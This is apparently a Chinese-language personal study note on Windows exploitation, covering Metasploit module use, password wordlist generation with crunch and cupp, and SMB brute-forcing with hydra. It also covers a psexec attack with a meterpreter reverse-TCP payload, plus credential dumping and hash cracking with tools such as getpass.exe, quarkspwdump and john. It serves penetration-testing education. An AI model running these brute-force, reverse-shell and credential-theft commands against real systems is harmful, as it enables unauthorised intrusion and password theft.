【从入门到放弃系列学习笔记7】web应用安全基础整理-windows漏洞利用
一、利用MSF来进行漏洞利用
MSF-metasploit framework
集成在kali里的渗透测试框架
msfconsole #启动命令 search ms17-010 #如何搜索漏洞,search + 形容词 use xxxx #找到modules后可以用use命令引用 set xxxx #设置参数 exploit #执行攻击
二、字典介绍
如要爆破首先你得有个字典,那么有几种类型的字典?
根据生成方式分:
- 弱口令字典
- 社工字典
- 字符集字典
根据用途分:
- 子域名字典
- 默认账号密码字典
- 文件路径字典
- 常用变量名字典
- 常用文件名字典
有哪些可以生成字典的工具?
crunch 可以生成枚举型的字典,集成在kali里
crunch 1 8 abcdecfg....... #生成一个最小1位 最大8位的字典
man crunch
#查看帮助
crunch <min-len> <max-len> [<charset string>] [option]
#用法
cupp 可以生成社工字典,(国外软件)
cupp -i #进入cupp生成工具
还可以百度各种社工字典生成器(国内软件)。
三、案例一:windows暴力破解
需要先分别准备一个默认账号名字典和密码字典
方法一:hydra命令集成在kali里
hydra -l #指定用户名 hydra -L #指定用户名文件 hydra -p #指定密码 hydra -P #指定密码字典
其他用法
hydra -L user.dic -P Pass.dic smb://192.168.12.1 -vV #用法 #-vV 显示爆破细节 #-o 保存爆破结果 #-f 找到正确的密码就停止爆破 #-e n null 以空密码尝试 # s same 以和账号相同密码尝试 # r 反向 密码反向尝试 #例子 -e nsr
#-t 线程数
方法二:用MSF来实现
use exploit/windows/smb/psexec_psh #装载载荷 set payload windows/meterpreter/reverse_tcp # show options set RHOSTS IP set SMBUSER ajest set ....
exploit
#执行爆破
四、案例二:windows内存中读取密码
前提条件:已经登录windows或有一定权限了
- 上传getpass.exe工具
- 执行该工具可以取得密码
原理是从内存中读。
五、案例三:windows账号密码hash值爆破
前提条件:得到账号的hash值文件
- 上传quarkspwdump.exe或hashdump.exe
- 执行后可得到账号密码hash值的文件。
- 通过kali进行john命令进行密码爆破
john 文件名 --format=NT
#可对hash密码进行爆破
浙公网安备 33010602011771号